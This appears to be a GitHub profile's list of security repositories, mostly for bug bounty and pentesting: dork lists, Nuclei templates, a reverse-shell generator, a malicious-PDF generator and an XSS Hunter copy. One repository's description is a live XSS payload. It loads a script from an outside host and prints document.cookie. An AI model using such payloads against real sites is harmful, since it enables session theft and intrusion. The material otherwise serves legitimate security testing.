HUNTER's repositories
40k-nuclei-templates
40,000+ Nuclei templates for security scanning and detection across diverse web applications and services
API-s-for-OSINT
List of API's for gathering information about phone numbers, addresses, domains etc
Awesome-Cybersecurity-Handbooks
A huge chunk of my personal notes since I started playing CTFs and working as a Red Teamer.
Bug-Bounty-Dork
Bug Bounty Dorks For World Wide Websites
bug-bounty-platforms
A community-powered collection of all known bug bounty platforms, vulnerability disclosure platforms, and crowdsourced security platforms currently active on the Internet.
Leaked-Credentials
how to look for Leaked Credentials !
malicious-pdf
💀 Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
WebHeckScanner
A hacking tool for bug bounties. Sharing and modifying is encouraged!
-script-src-https-xss.report-c-lover-script-
'/;//"><script src=https://xss.report/c/lover></script> <img src="data:image/png;base64,iVBORw0KGgo=" onerror="prompt(document.domain)"> <img src="data:image/png;base64,iVBORw0KGgo=" onerror="prompt(document.cookie)">
awesome-android-security
A curated list of Android Security materials and resources For Pentesters and Bug Hunters
Awesome-Dorks
Dorks for Bug Bounty Hunting
bug-bounty-dorkss
List of Google Dorks for sites that have responsible disclosure program & bug bounty program
Conferences
Conference slides
github-dorkss
Useful Github Dorks for BugBounty -
google-dorks-bug-bounty
A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting
igoat
OWASP iGoat - A Learning Tool for iOS App Pentesting and Security by Swaroop Yermalkar
MindAPI
Organize your API security assessment by using MindAPI. It's free and open for community collaboration.
NFT-Attack-Vectors
This Repository contains list of Common NFT Attack Vectors. If you find any attack vectors missing, you can create a pull request and be a contributor of the project.
One-Liners
A collection of awesome one-liners for bug bounty hunting.
PayloadsAllThePDFs
PDF Files for Pentesting
shells
Little script for generating revshells
Software-
Softwares & Tools For Easy Work
Useful-Free-Online-Tools-and-Sites
Useful free online tools and sites
userefuzz
User-Agent , X-Forwarded-For and Referer SQLI Fuzzer
vapi
vAPI is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios through Exercises.
whoismthcopy
Online Websites & Tools For Easy Job
xsshunter-express
An easy-to-setup version of XSS Hunter. Sets up in five minutes and requires no maintenance!
XXElixir
This tool is designed to test for file upload and XXE vulnerabilities by poisoning XLSX files.